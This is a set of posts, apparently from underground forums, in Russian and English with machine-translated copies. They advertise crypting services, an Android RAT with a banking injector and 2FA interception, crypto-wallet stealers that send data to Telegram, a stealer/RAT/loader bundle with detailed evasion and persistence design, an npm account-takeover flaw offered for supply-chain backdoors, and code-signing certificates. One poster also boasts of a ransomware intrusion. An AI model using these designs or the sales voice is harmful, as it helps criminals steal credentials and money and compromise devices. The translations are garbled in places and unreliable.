подписанного действительной цифровой подписью файла, пробивая AV/EDR защиту
Помимо создания сборок, которые будут длительно чистыми в скантайме, есть
возможность немного "оживить" грязные пейлоады, сделав рантайм чище
Так же имеется возможность сделать чистый PS1 для бесфайлового деплоя, либо
почистить уже существующий
Работаю руками, сервис не массовый, это не автокриптор а индивидуальная
предложение. Пейлоад собирается под Ваши нужды, возможна чистка от конкретных
АВ или тест в специфических окружениях
Цена на мою работу начинается от 1к, работаю через гарант
Контакт ПМ
Buying persistence mechanism (Go or C#) that is not public and currently undetected. Only through escrow. Before release I will check if AV checks in that REG / location specifically.
закрыто по просьбе покупателя
PS в данный момент работает с FortiVPN
Софт работает шустро находит из массива валида аккакнты с которых видно сетки
hello fellows, i search a local pos malware ( dumps grabber ) , only with source code , payment in BTC/XMR, budget 1000-1500$ depends on what you have. please leave jabber in private.
Ищу приватный софт. Имею стабильный поток инсталлов.
Рассматриваю как партнерство, так и аренду.
Конаткт в ПМ.
I found a zero-day in a PHP file space to a website I hacked. I hacked them once and installed ransomware; they responded by taking the site down for a little over two weeks. Once I noticed it was back up I tried my same method of using an admin password I cracked an reuploaded the same shell. This allowed me to rehack the site in 5 minutes, all I did was log in upload a file and NT Authority / System was regained. I made some posts about this to if you want to verify it. One thing my webshell did was log commands and their outputs to a file, this allowed me to save a copy of every file I opened. The site was brought back up ad the password was changed because I had multiple SQL logins. I was able to get the new admin password but I was not going to reattempt cracking it, especially because it was bcrypt hashed an I dont have a powerful computer. While reviewing the php files I noticed a vulnerability that was very valuable. Once I found it I took a walk to calm down and think about all the other access I had, this helped clear my mind from they insane high and now I've just finished coding a crazy exploit!
I found a zero day in the PHP file space on a website I hacked. I had hacked them once and installed ransomware, they responded by shutting down the site for a little over two weeks. Once I noticed it was a backup I tried the same method of using the admin password I had cracked and re-downloaded the same shell. This allowed me to rehack the site in 5 minutes, all I did was log in, upload a file and NT Authority/System was restored. I have made a few posts about this if you want to check it out. My web shell did one thing, it logged the commands and their output to a file, this allowed me to keep a copy of every file I opened. The site was restored and the password was changed since I had multiple SQL logins. I was able to get the new admin password but I wasn't going to try again especially since it was hashed with bcrypt and I don't have a powerful computer. While looking through the php files I noticed a very valuable vulnerability. Once I found it I went for a walk to calm down and think about all the other accesses I had, it helped clear my mind from the crazy high and now I just finished coding a crazy exploit!
Spoiler: Closed on deposit / Закрыто на депозит: $2500
eng:
Real-Time Screen Control
View and control the phone screen live.
Stealth management with options to black out the screen or display custom text
messages. Example: "Your phone is updating, please wait."
Camera Access (Front & Rear)
Hidden access to both front and rear cameras.
Live streaming from the client’s device.
Microphone Control (Listen & Speak)
Secret microphone access to listen to the surroundings of the device.
Speak directly through the phone in real time if needed.
Keylogger (Offline & Online)
Online Mode: Track password entries in real time.
Offline Mode: Retrieve saved data (e.g., passwords, app inputs, website
logins), including timestamps and date stamps.
Screen Text Monitoring
Real-time monitoring of all text displayed on the client’s screen.
Simplified Live Screen
A lightweight screen-sharing option (ideal for bypassing security systems like
banking apps or Play Protect).
Share access selectively to exclude data-intensive outputs.
Location Tracking
Precise geolocation tracking (up to 2-meter accuracy).
File Manager
Full hidden access to the file system.
Manage files with editing, deleting, replacing, installing, and downloading
capabilities.
Call Log Manager
View and monitor all call logs and contacts stored on the device.
Custom Banking Injector
Swap real banking apps with fake ones, intercept credentials, and capture
sensitive data.
Works globally, ensuring full adaptability to local systems.
Auto-Dial
Dial any number directly via the client’s device.
SMS Viewer & Sender
View all old and new SMS messages on the client's device in real time.
Send SMS messages to any number or name with custom text content.
Contact List Access
View the complete contact list saved on the client’s phone.
Edit, export, or import contacts as needed.
Cryptocurrency Clipper
A powerful tool for replacing cryptocurrency wallet addresses with your own in
real-time.
Example: When the victim copies a wallet address to send crypto, it is
replaced with the pre-set address (clipboard hijacking).
Google 2FA Interceptor
Secretly intercept any two-factor authentication codes.
Example: Use it to confirm crypto transfers from exchange platforms.
Hidden Terminal
A concealed system terminal for executing scripts and commands on the client’s
device.
Application Manager
Hidden access to the list of installed apps on the phone.
Launch, uninstall, or install any application remotely.
Screen Lock/Unlock
Lock the client’s phone screen at any time.
Automatically unlock the screen and bypass PIN codes.
Popup Message Display
Display custom pop-up messages on the client’s screen.
Admin Rights Request
Request administrator permissions for broader device control.
Example: Prevent future scans from any antivirus or security app and ensure
that the RAT becomes impossible to uninstall.
Notification Reader
Access and read all client notifications in real time.
Email & Account List Access
View all login credentials and email accounts on the client’s device,
including Gmail and other email services.
Open Targeted Links
Open any specified website, phishing page, or URL on the client’s device.
Self-Destruct Virus
Initiate self-destruction of the RAT from the client’s device to ensure
complete removal when necessary.
Connection Control & Anti-Deletion
Restart the connection with the client’s device or disable protection against
removal.
Client Data Folder Access
Gain access to the client’s data folder, including full detailed information
about the device and its contents.
Pricing Plans
Monthly Plan: $700
Annual Plan: $4,000
Lifetime Access: $20,000
escrow+
rus:
Управление экраном в реальном времени
Просмотр и управление экраном телефона клиента в реальном времени.
Возможность скрытого управления, затемнения экрана или вывода любого текста.
Например: «Телефон обновляется, пожалуйста, подождите».
Камера (Фронтальная и Основная)
Скрытое подключение к камере клиента (фронтальная и основная).
Просмотр изображения в режиме реального времени.
Микрофон (Слушать/Говорить)
Скрытое подключение к микрофону клиента.
Возможность слушать окружающую обстановку или говорить через телефон.
Кейлоггер (Офлайн/Онлайн)
Онлайн-режим: отслеживание паролей в реальном времени.
Офлайн-режим: сохраненные данные (логины, пароли, вводимые данные) с указанием
времени и даты.
Просмотр текста на экране
Мониторинг в реальном времени всего текста, отображаемого на экране клиента.
Упрощенный live-экран
Облегченная версия трансляции экрана для обхода защиты приложений, таких как
банковские.
Возможность выборочной передачи данных без лишней нагрузки.
Определение местоположения
Узнавайте точную геолокацию клиента (до 2 метров).
Файловый менеджер
Полный доступ к файловой системе телефона.
Редактирование, удаление, копирование и установка файлов.
Менеджер звонков
Просмотр всех вызовов клиента и его телефонной книги.
Банковский инжектор
Замена настоящего банковского приложения на поддельное для кражи данных.
Работает по всему миру.
Автодозвон
Совершение звонков на указанный вами номер через телефон клиента.
Просмотр SMS/Отправка SMS
Просмотр всех SMS-сообщений, как старых, так и новых.
Отправка SMS с любого имени или номера.
Список контактов
Доступ ко всем контактам клиента.
Редактирование, экспорт и импорт контактов.
Крипто валютный клипер
Замена скопированного крипто адреса жертвы на ваш.
Позволяет автоматически перехватывать и изменять адрес для перевода
криптовалюты.
Перехват Google 2FA
Перехват любых кодов двухфакторной аутентификации.
Например, для подтверждения переводов на биржах.
Скрытый терминал
Открытие системного терминала для выполнения команд или скриптов.
Менеджер приложений
Просмотр установленных приложений на устройстве.
Удаление, запуск и установка программ.
Заблокировать экран
Полная блокировка экрана клиента.
Разблокировка экрана
Автоматическая разблокировка и обход PIN-кода.
Показ всплывающего сообщения
Вывод любого текста на экране клиента в виде всплывающего окна.
Запрос прав администратора
Получение прав администратора для защиты от удаления и усиления контроля.
Чтение уведомлений
Слежение за всеми уведомлениями клиента в реальном времени.
Учетные записи и почта
Просмотр логинов и паролей, а также доступа к учетным записям Gmail и другим
почтовым сервисам.
Открыть целевую ссылку
Запуск любого указанного сайта или фишинговой ссылки на устройстве клиента.
Самоуничтожение вируса
Удаление RAT с устройства клиента по вашему запросу.
Соединения и защита от удаления
Перезапуск соединения с клиентским устройством или отключение защиты от
удаления.
Тарифы
Месяц: 700$
Год: 4000$
LifeTime: 20000$
гарант+
Возьму в аренду софт для работы на длительное время
рат/хвнц/хрдп
Цена до 3000$ в месяц
Гарант приветствуется.
Есть инсталы с паблишера, возможно сотрудничество на %
Все обсуждаем, контакт в лс
Всем привет,
Продаю по лоу прайсу софт который можно в пару клиликов настроить под
практически любое приложение, в то время как под капотом будет собираться и
информация о телефоне + вы будете получать смс с телефона + у вас будет место
положение телефона с точностью до 10 метров.
Прицеп работы: Пользователь скачивает приложение которое прикрывается каким-
либо сервисом, например: Почта, макректплейсом и т.д(Можно настрой почти под
любое приложение). , а в это время с его телефона крадутся такие данные как:
Все данные пересылаются в тг бота.
Скрины могу предоставить в лс тг .
Сурс код - 50$
Сурс + настройка под вас - 65$
Hello everyone,
I am selling software at a low price that can be configured in a couple of
clicks for almost any application, while under the hood, information about the
phone will be collected + you will receive SMS from the phone + you will have
the location of the phone with an accuracy of 10 meters.
Work trailer: The user downloads an application that is covered by some
service, for example: Mail, marketplace, etc. (You can configure it for almost
any application). , and at this time, such data as:
serial number of the phoneAll data is sent to the tg bot.
I can provide screenshots in PM tg.
Source code - 50$
Source + individual settings - 65$
Продаю Brute Ratel C4 (BRC4) 1.7.4.
Продажа в одни руки, в связи с ненадобностью. Лицуха до января 25 года. В
пользовании не был. Инструкция+ мануал.
Гарант.
Hello everybody. Today we will introduce you our latest project Se7enBot
Crypto Wallet Stealer.
This malware is specifically designed for stealing cold crypto wallets from
Windows machines by using two different methods.
First Se7enBot will force victim to enter his wallet backup phrase by
overlaying a fake screen when victim tries to launch his wallet app. The
second method is classic wallet file stealing but wallet files are useless
without having wallet passwords. So Se7enBot will capture victims keylogs on
original wallet apps and send them to you via Telegram.
We used Telegram bot to log information as law enforcement can't request user
data from Telegram and take down Telegram bots. You don't have to worry about
privacy or server takedown.
Se7enBot provides fake backup phrase stealer for following crypto apps:
Atomic Wallet, Exodus, Ledger Live, Trezor, Coinomi, Guarda, Wasabi Wallet
Click to expand...
Se7enBot steals wallet files from following crypto apps:
Atomic Wallet, Exodus, Ledger Live, Trezor, Coinomi, Guarda, Wasabi Wallet, Electrum, Zcash, Armory, Bytecoin, Jaxx
Click to expand...
Features:
- Auto Windows startup installation
- Crypto backup phrase stealing screens for 7 different wallets
- Wallet file and keylog stealer for 12 crypto wallets
- Keylogger only works on crypto wallet apps so you don't get trash keylogs
- Wallet files are delivered in a zip file via Telegram bot
- All logs send via Telegram bot to protect you from data disclosure and server takedowns
- Coded with C# on .NET 4.7
- Works on Windows 8/8.1,10,11
- Build size is only ~30KBClick to expand...
Price: 500 USD lifetime license. First 10 buyers will get lifetime license for
only 300 USD.
Testing is available after creating an escrow order and depositing the price
on forum. There is no AV detections as of today, malware is freshly coded and
will be sold here for the first time. We will also add new crypto app overlays
for customers without any fees.
Check screenshots below to understand how the malware works.
**Today I am SELLING awww.npmjs.com Account Takeover Vulnerability.**
You can buy thisVulnerability** and do amazing things with it, such as:
1. Targeting npm accounts of specific organization employees to inject undetectable backdoors into the packages they use. Once these packages are updated, all organization devices could be compromised.**
2. Targeting npm accounts of developers whose packages are widely used, allowing for the injection of backdoors. Updates to these packages could potentially compromise all devices utilizing them.
**3. Accessing to private organization packages for negotiation purposes—either for ransom or public disclosure.
All transactions are conducted only through Escrow.
If you are interested, PM me with your offer, and we can discuss the details further.
I realize that my account is new, which might raise concerns about potential fraud. However, please rest assured. All transactions are securely handled through Escrow, ensuring there is no risk of fraud on my part**
Spoiler: ru
Spoiler: Stealer
Stealer Xabarovsk (Win | чистая Java) — это вредоносная программа, которая предназначена для кражи конфиденциальных данных с зараженного устройства. Xabarovsk предназначен для следующего:
1. Кража логинов и паролей: собирает браузеры(
Brave
Chrome
Edge
Firefox
Opera
OperaGX
Vivaldi
Yandex
), такие как учетные записи веб-сайтов, куки, данные банковских карт, история
посещений, логины и пароли(расшифровка на стороне зараженного пк), расширение.
2. Кража файлов(
Расширение
txt
pdf
png
jpg
jpeg
пути: pictures, desktop
): сбор происходит рекурсивно, проходит по всем папкам и подпапкам и собирает
все файлы с нужным расширением. Файлы копируются и передаются на удаленный
сервер.
3. Кража десктопных приложений:
Telegram
Steam
Discord
Телеграм - tdata, дискорд и стим - как браузер(token), так и с десктопная версия.
4. Кража информации о системе: собор информации о системе, такую как
IP-адреса,
Характеристики оборудования
Имя пользователя
Запущенное программное обеспечение
Сетевые интерфейсы
Имя хоста
Город и регион
Буфер обмена
Время запуска
Путь запуска
5. Кража в реальном времени. Захват
веб камеры
скриншот экрана
6. Кража десктопных криптокошельков:
bitcoin
exodus
jaxx
atomic
7. Сбор запущенных процессов
штатных для работы ОС
запущенных пользователем
8. Кража VPN десктопных приложений: сбор таких vpn как
NordVPN
Surfshark
ProtonVPN
ExpressVPN
PureVPN
9. Кража инструментов для администрирования:
FileZilla(FTP-клиент)
10. Проверка виртуалки/песочницы
Запуск только на десктопных версиях ОС
11. Запуск HVNC
обфусцированные проект на чистом C (будет добавлен по вашему желанию)
12. Обход АВ
Добавлены динамические таймауты по всей программы которые с каждым запуском в
разных местах и разно скоростью реализуют задержку исполнения какого либо
модуля
Мусорные части кода
Белые куски кода с выполнением полезных мусорных задач
Искусственное увеличение используемой оперативной памяти при старте
Лог сохраняется на жестком диске системы. Стиллер строит динамически количевство папок и их имя куда будет сохранен лог. Так же можно добавить пути куда может быть сохранен лог, и после отправки удален. Например, если у пользователя есть хром браузер, то временный лог можно положить в папку кеша, или же если есть телеграм, то в папку телеграма. Если таких программ нет, то делаем динамические пути и их имена и сохраняем туда. Все это сделано динамически и можно легко настроить.
Реализована многопоточность, все функции программы начинают свою работу одновременно и асинхронно, Что уменьшает время работы программы.
Не работает по странам СНГ и работать не будет.
Весь код на 95% уникален(только работа с браузерами была подсмотрена из другого проекта).
Нет админ панели, логи приходят просто в виде архива, расшифровываются по уникальному ключу и разархивируются.
Динамический стаб(вызов модулей с каждым запуском происходит в рандомном порядке).
Сам лог перед отправкой архивируется и шифруется по алгоритму aes256, и передается на сервер(ftp оправка нужно указать лишь ip/port сервера). Как лог пришел на сервер, он разархивируется и расшифровывается.
Все пути до собираемых ресурсов, а также до информации о ip/port сервера, зашифроаванны по алгоритму aes256. Хранятся в настройках программы в зашифрованном виде, только когда программа запущена, она динамически при использовании какого то конкретного модуля расшифровывает нужную строку. Например, при сборе крипто кошельков, по очередно берутся зашифрованные пути, расшифровываютя и передаются в модуль, расшифрованные пути хранятся только в памяти. По такому же смыслу отправляется и лог(в зашифрованном виде).
Программа написана полностью на java. Зависимости есть, но они не подгружаются
с сервера, а уже идут с коробки, из за этого вес билда довольно большой(8 мб)
в jar. Исходный код программы обфусцируется с помощью штатного обфускатора и
после этого java код пересоберается в нативный код с помощью graalvm.
Дело в том, что java запускается только если на пк есть jvm(java виртуальная
машина), без нее программа к сожалению не запуститься. Так же минусом будет
скорость программы(побыстрее конечно чем питон, но и помедленнее плюсов), из
за того что код передается с начало в jvm, там он компилируется в машинный код
и только потом исполняется.
Но с помощью graalvm мы сразу из java соберем нативный(машинный) код, в .exe а
не .jar. что гораздо ускорит скорость отработки стиллера(менее 3с), и добавит
возможность запуска без jvm, даже на чистых машинах. Так же вес нативно
собранного билда - около 3 мб.
Есть базовый криптор для добавления мусорного кода, изменения ключей шифрования строк, изменения зашифрованных строк на новые(под ключ шифрования), изменения на рандомные имен классов/методов/переменных.
Так же реализована простенькая функция подписки - после определенной даты, программа перестает запускаться. Ее можно легко убрать или оставить по вашему желанию.
При работе используются следующие зависимости:
org.json | - для сбора информации о пк
jna для работы с winapi _
sarxos для захвата веб камеры(удаляется при желании)
org.apache.commons для копирования директорий
windpapi4j для вызова некоторых системных функций виндовс
Spoiler: Rat
Rat Kosmos (Win/Mac | чистая Java) [АНОНС ПОКА НЕ ДОСТУПЕН] способен работать на MacOS и windows. А именно он умеет:
1. Кража файлов(
Расширение
txt
pdf
png
jpg
jpeg
пути: desktop, downloads
): сбор происходит рекурсивно, проходит по всем папкам и подпапкам и собирает
все файлы с нужным расширением. Файлы копируются и передаются на удаленный
сервер.
2. Кража информации о системе: собор информации о системе, такую как
IP-адреса,
Характеристики оборудования
Имя пользователя
Запущенное программное обеспечение
Сетевые интерфейсы
Имя хоста
Город и регион
Буфер обмена
Время запуска
Путь запуска
3. Кража в реальном времени. Захват
веб камеры
скриншот экрана
Без создания значка запуска приложения(процесс фоновый)
4. Клиппер: подмена буфера обмена, проверяется буфер, и если строка
криптокошелек(
btc
xmr
ltc
doge
usdt
), банковская карта, то программа подменит ее на другой. Который хранится в
зашифрованном виде в настройках программы.
5. Кейлогер: перехватывает все нажатые пользователем клавиши клавиатуры и записывает их в txt фаил.
6. Сбор буфера обмена: постоянный чек и запись в txt фаил всей информации которая попадает в буфер обмена.
7. Прописывается в автозагрузку(mac/win).
Лог храниться перед отправкой на жестком диске. Пути создается либо динамически с рандомной цепочкой файлов и присваивает им рандомное имя, либо сохраняется в путь файлов который есть заранее, и если их не обнаруживает создает свои. Перед отправкой архив с логом шифруется(aes256), и расшифровывается уже на сервере.
Пути так же шифруются по aes256, и расшифровываются по очередно в момент использования.
Логи с каждого компьютера отправляются 1 раз в месяц. Старый отправленный лог удаляется и создается новый с новыми данными.
Так же программа написана полностью на java. И имеет следующие зависимости,
которые лежат в коробке с программой, а не подкачиваются в ходе ее работы
jnativehook(перехват нажатий клавишь)
org.json | - для сбора информации о пк
sarxos для захвата веб камеры
Spoiler: Trojan/Loader
Trojan Drushba (Mac/Win | чистая Java) - оснащен функцией дроппера для полезной нагрузки, а конкретно для скачивания основного файла(допустим какой либо программы, под предлогом чего и запускается лаунчер). И Следом после нее, как только основная программа скачалась до n %, начинается установка полезной нагрузки. Всего может быть вместе с основной программой установлено 3 доп программы.
Полезная нагрузка спрятана в картинке. Как только картинка скачалась, ее содержимое расшифровывается(aes256), и в зависимости от настроек(должна ли она быть постоянно на компьютере, или одноразово запуститься и удаляется).
Все строки с настройками, а это пути url, откуда полезная нагрузка в виде картинки скачивается - зашифрованы, и расшифровываются по очередно, по мере необходимости для работы программы.
На стороне сервера реализован удобный криптор исполняемых файлов, которые в конечном итоге перезапишутся в картинку. Так же реализован криптор строк, что бы каждое значение не шифровать отдельно. Строки поделены на части, и собираются как пазл при выполнении программы.
Полезные нагрузки котрые требуют постоянного нахождения на пк, добавляются в авто загрузку. И на маке и на виндовс.
Реализован простенький обфускатор, который динамически заполняет оперативную память различными мусорными данными. Данные на вход каждый раз подаются рандомные.
При настройке программы, есть 2 варианта графического интерфейса, которые покажутся юзеру:
Старт скачивания полезных нагрузок начинается только после n %, как скачалась
основная программа(для усложнения обнаружения вт), идет запуск полезной
нагрузки спустя n секунд.
Реализована многопоточность. То есть программа одновременна начинает скачивать
и основное по, и полезные нагрузки. Так же полезные нагрузки одновременна
начинают свою работу в разных процессах.
В данной программе нет абсолютно никаких зависимостей. Все используемые
библиотеки есть в стандартном java пакете. Вес билда обусловлен графическим
интерфейсом(картинки и гифки). Сам же интерфейс тоже полностью с коробки,
использовался swing.
Программа с начало собирается в jar исполняемый фаил, затем обфусцируется с
помощью штатного обфускатора. И что бы она могла запускаться на пк, которые не
имеют java, собираются с помощью graalvm в нативной код. Что существенно
ускоряют время запуска файла, и дает возможность запуска на чистых ос.
Так же программа проверяет на какой ос она работает. В случае с виндовс запускается стиллер Xabarovsk , и HVNC(к сожалению реализовать его на чистой java я не смог, по этому взял проект на C и обфусцировал их, можно HVNC и полностью убрать если не потребуется для работы). Если же запустилась программа на мак ос, то сама по себе она будет в .jar формате, тк exe фаил не запустишь на мак. И в этом случае отработает Kosmos. Стиллер требует разовой отработки, так что после отправки лога он удалиться, а в случае с HVNC или Kosmos, где присутствие требуется постоянно - программа пропишет ее в автозагрузку, и спрячет в системный фаил и даст неприметное название.
Реализована проверка на двойное срабатывание. Если официальное ПО, под предлогом установки которого и запускается программа уже есть на пк, то программа просто не запуститься, уведомив юзера что данная программа уже скачена.
Spoiler: Цель
Я бы хотел найти человека, который захочет приобрести исходники сразу всех 3
программы, которые я описал выше. Продажа строго в одни руки, возможна
дальнейшая поддержка всех программ с фиксированным для меня окладом или
разовые доработки. В принципе тк у вас будут все исходники на руках вам не
составит труд самому добавлять нужный вам функционал или искать другого кодера
для его улучшения.
На экспе не так давно видел обьявление, где человек искал кодера который
напишет ему стиллер + веб панель с прайсом в +10к$. За свои три
проекта(Stealer Xabarovsk , Rat Kosmos, Trojan Drushba) я бы хотел получить
20к$, но я всегда готов рассмотреть ваше предложение!
Только за что бы провести сделку через гаранта!
Spoiler: en
Spoiler: Stealer
Stealer Xabarovsk (Win | Pure Java) is a malicious program that is designed to steal confidential data from an infected device. Xabarovsk is designed for the following:
1. Theft of login and passwords: collects browsers (
Brave
Chrome
Edge
Firefox
Opera
Operagx
Vivaldi
Yandex
), such as web sites, cuckoo accounts, bank cards data, visits, login history
and passwords (decryption on the side of the infected PC), expansion.
2. Theft of files (
Extension
TXT
PDF
PNG
JPG
JPEG
Paths: Pictures, Desktop
): The collection takes place recursively, passes through all folders and
submarines and collects all files with the desired extension. Files are copied
and transferred to a remote server.
3. Theft of desktop applications:
Telegram
Steam
Discord
Telegram - tdata, discord and steam - both a browser (token), and with a
desktop version.
4. Theft of information about the system: Cathedral of information about the
system, such as
IP address,
Equipment characteristics
User name
Running software
Network interfaces
The name of the host
City and region
Boofer of exchange
Launch time
The path of launch
5. Theft in real time. Capture
Webcams
Screenshot of the screen
6. Theft of desktop cryptocurrencells:
Bitcoin
Exodus
JAXX
Atomic
7. Collection of advanced processes
full -time OS
launched by the user
8. Theft of VPN desktop applications: the collection of such VPN as
Nordvpn
Surfshark
Protonvpn
Expressvpn
Purevpn
9. Theft of tools for administration:
Filezilla (FTP client)
10. Checking virtualists/sandbox
Launching only on desktop versions of the OS
11. Launch of HVNC
Reduced project on pure C (will be added at your request)
12. Circle AB
Dynamic timauts have been added throughout the program that, with each launch
in different places and at different speeds, implement a delay in the
execution of any module
The trash parts of the code
White pieces of code with useful garbage tasks
Artificial increase in the use of RAM when starting
The log is stored on the hard drive of the system. Stiller builds dynamically the number of folders and their name where the log will be preserved. You can also add the ways where the log can be preserved, and after sending it is removed. For example, if the user has a chrome browser, then a temporary log can be put in a cache folder, or if there is a telegram, then in a Telegram folder. If there are no such programs, then we make dynamic paths and their names and save there. All this is done dynamically and can be easily configured.
Multiplying has been implemented, all the functions of the program begins their work simultaneously and asynchronously, which reduces the operating time of the program.
It does not work in the CIS countries and will not work.
The entire code is 95% unique (only work with browsers was spied from another project).
There is no admin panel, the logs come simply in the form of an archive, deciphered according to a unique key and unzipped.
A dynamic stub (a call of modules with each launch occurs in a random order).
Before sending, the log itself is archivated and encrypted by the AES256 algorithm, and is transmitted to the server (ftp mandrel must only indicate the IP/port of the server). As the log came to the server, it is unzipped and deciphered.
All ways to the collected resources, as well as to the information about the IP/port server, are encrypted according to the AES256 algorithm. They are stored in the program settings in encrypted form only when the program is launched, it dynamically deciphers the desired line when using some specific module. For example, when collecting crypto wallets, encrypted paths are taken by the next, deciphered and transmitted to the module, decrypted paths are kept only in memory. In the same meaning, the log is also sent (in encrypted form).
The program is written completely on Java. There are dependencies, but they are not loaded from the server, but are already coming from the box, because of this, the weight of the build is quite large (8 MB) in Jar. The source code of the program is covered with the help of a standard compulsion and after that Java is retreated to the Native code using Graalvm.
The fact is that Java starts only if the PC has a JVM (Java virtual machine), unfortunately, the program cannot be started without it. The speed of the program will also be the minus (of course, of course, than the python, but also more than the pluses), due to the fact that the code is transmitted from the beginning in JVM, there it is compiled to the machine code and only then executed.
But with the help of Graalvm, we immediately from Java will collect the native (machine) code, in .exe and not .jar. Which will much speed up the speed of working out the style (less than 3C), and add the possibility of starting without JVM, even on clean machines. Also, the weight of the native build - about 3 MB.
There is a basic cryptor for adding a garbage code, changing the encryption keys, changes in encrypted lines to new (turnkey encryption), changes to the random names of classes/methods/variables.
A simple subscription function is also implemented - after a certain date, the program ceases to start. It can be easily removed or left according to your desire.
When working, the following dependencies are used:
Org.json | - to collect information about PC
JNA for working with Winapi _
SARXOS for capturing a web camera (deleted if desired)
Org.apache.commons for copying directory
Windpapi4j to call some systemic functions Windows
Spoiler: Rat
Rat Kosmos (Win/Mac | Pure Java) [The announcement is not yet available] is capable of working on MacOS and Windows. Namely, he knows how:
1. Theft of files (
Extension
TXT
PDF
PNG
JPG
JPEG
Paths: Desktop, Downloads
): The collection takes place recursively, passes through all folders and
submarines and collects all files with the desired extension. Files are copied
and transferred to a remote server.
2. Theft of information about the system: Cathedral of information about the
system, such as
IP address,
Equipment characteristics
User name
Running software
Network interfaces
The name of the host
City and region
Boofer of exchange
Launch time
The path of launch
3. Theft in real time. Capture
Webcams
Screenshot of the screen
Without creating an application launch badge (background process)
4. Clipper: substitution of the exchange buffer, the buffer is checked, and
if the line of the crypto -coolant (
BTC
XMR
LTC
DOGE
USDT
), a bank card, the program will replace it with another. Which is stored in
encrypted form in the program settings.
5. Keiller: intercepts all the keyboard keys pressed by the user and records them in Txt Fail.
6. Collection of exchange buffer: permanent check and entry in TXT FAIL all the information that enters the exchange buffer.
7. is prescribed in the car load (Mac/Win).
The log is stored before sending on a hard drive. The paths are created either dynamically with a random chain of files and assigns a random name to them, or stored on the path of files that are in advance, and if it does not detect them creates their own. Before sending, the archive with the log is encrypted (AES256), and deciphered already on the server.
The paths are also encrypted along AES256, and decrypted by the next at the time of use.
Logs from each computer are sent once a month. The old sent log is removed and a new one is created with new data.
The program is also completely written on Java. And has the following dependencies that lie in the box with the program, and do not pump up during its work
jnativehook
Org.json | - to collect information about PC
sarxos for capture webcams
Spoiler: Trojan/Loader
Trojan Drushba (Mac/Win | Pure Java) - is equipped with a dropper function for payload, and specifically for downloading the main file (say any program, under the pretext of which the launcher is launched). And after it, as soon as the main program downloaded to n %, the installation of a payload begins. In total, 3 additional programs can be installed along with the main program.
The payload is hidden in the picture. As soon as the picture is downloaded, its contents are deciphered (AES256), and depending on the settings (whether it should be constantly on the computer, or to start and delete once).
All lines with settings, and these are the paths of the URL, where the payload in the form of the picture is downloaded - is encrypted, and decrypted according to the next, as necessary for the work of the program.
A convenient cryptor of executable files is implemented on the server side, which will ultimately rewrite the picture. A lines cryptor is also implemented so that each value cannot be encrypted separately. The lines are divided into parts, and collected like a puzzle when executing the program.
Cotle loading loads require constant location on a PC, added to the car loading. And on poppy and on Windows.
A simple obstacle is implemented, which dynamically fills the RAM with various garbage data. The input data is supplied each time random.
When setting up the program, there are 2 options for a graphic interface that will seem to the user:
the interface of the office program (a package of office programs, code editors/photo/video, etc.)
the interface of the game launcher (games, cheats, cracks, etc.)
starting without an interface of immediately useful loads
The start of downloading benefits begins only after N %, how the main program was downloaded (to complicate the discharge of TU), the payload is launched after n seconds.
Multiplying is realized. That is, the program is simultaneously starting to download both the main software and useful loads. Also, beneficial loads are simultaneously starting their work in different processes.
There are absolutely no dependencies in this program. All libraries used are in the standard Java package. The weight of the build is due to the graphic interface (pictures and gifs). The interface itself is also completely from the box, Swing was used.
The program from the beginning is assembled in JAR executable facilus, then focus with the help of a regular obstacle. And that it could be launched on a PC that do not have Java, gather using Graalvm in a native code. Which significantly accelerates the time of launching the file, and makes it possible to launch on clean OS.
The program also checks which OS it works for. In the case of Windows, the Xabarovsk styller is launched, and HVNC (unfortunately I could not implement it on a pure Java, so I took the project on C and focused them, you can HVNC and completely remove it if it is not required for work). If the program has launched for Mac OS, then it itself will be in the .Jar format, TK EXE FAIL will not be launched on the poppy. And in this case, Kosmos will work out. Stiller requires a one -time development, so after sending the log it, it will retire, and in the case of HVNC or Kosmos, where the presence is constantly required - the program will prescribe it in a car machine, and will hide it in a systemic facet and give an inconspicuous name.
Implemented a double -response check. If the official software, under the pretext of installing which the program is already being launched, is already on the PC, then the program simply cannot start, notifying the user that this program is already downloaded.
Spoiler: Purpose
I would like to find a person who will want to purchase the source at once all 3 programs that I described above. Sale is strictly in one hand, further support of all programs with salaries fixed for me or one -time improvements is possible. In principle, TC will have all the sources on your hands will not make up the work of adding the functionality you need or look for another code to improve it.
At the Exp, not so long ago I saw an announcement where a person was looking for a coder who would write to him a styller + a web panel with a price of $ 10k. For my three projects (Stealer Xabarovsk, Rat Kosmos, Trojan Drushba) I would like to get $ 20k, but I'm always ready to consider your offer!
Only for what to conduct a deal through the guarantor!
Приветствую всех. Предоставляем вашему вниманию Sharp Stealer
Работает с браузерами: Chromium, Geko, Edge, Firefox, Yandex, Opera/GX,
Slimjet, EpicPrivacy, Vivaldi, Iridium, UR Browser, Comodo, Google Chrome,
Brave Software
При написание билда не использовались посторонние библиотеки.
Докупать ничего не нужно, всё уже настроено за вас. Купил и сразу лей
Стучит в телеграм бота.
Билд легко поддается крипту.
Можно докупить крипт, + 5$ к цене ( результат
https://avcheck.net/id/73jaAjG2fWfj )
!НА ТЕСТ НЕ ВЫДАЕМ!
Spoiler: Сборщик
- Telegram
- Screenshot
- Раб стол (files)
- Популярные криптокошельки ( Exodus, Monero, Zcash, Jaxx, Electrum, DashCore
и так далее )
- Информация о пк: бсид, хвид, ram, cpu, gpu, IP и т.д.
- Браузеры: Chromium, Geko, Edge, Firefox, Yandex, Opera/GX, Slimjet,
EpicPrivacy, Vivaldi, Iridium, UR Browser, Comodo, Google Chrome, Brave
Software ( пароли, куки, заполнения)
- Сбор FTP сервисов ( TotalCommander + FileZilla )
- Популярные VPN сервисы ( NordVPN, ExpressVPN, OpenVPN и т.д.)
- Дискорд ( точечный поиск по браузерам ), собирает токен, id аккаунта,
никнейм аккаунта, почта, привязанный телефон и проверка на наличие MFA
- Стим
Spoiler: Панель + Лог
Цена за 1 месяц использования: 30$
Цена за 3 месяца: 50$
Цена за Lifetime: 150$
EV byGlobalSign - $3 500 (in stock, exp. in 1 year)
EV by SSL.com (Cloud) - $2 500(in stock, exp. in 1 year**)****
OV by SSL.com (Cloud) - $800(in stock, exp. in 1 year**)**
Jabber: certs@thesecure.biz**
Today I am SELLING a Burp Suite Professional licenses vulnerability!
**Burp Suite Professional, priced at $449 per user annually, requires each user to have a separate subscription.
I have discovered a vulnerability that allows the creation of unlimited Burp Suite Professional licensesfor any number of users** at no cost.****
All transactions are conducted only through Escrow.
**If you are interested, PM me with your offer, and we can discuss the details further.
I realize that my account is new, which might raise concerns about potential fraud. However, please rest assured. All transactions are securely handled through Escrow, ensuring there is no risk of fraud on my part**
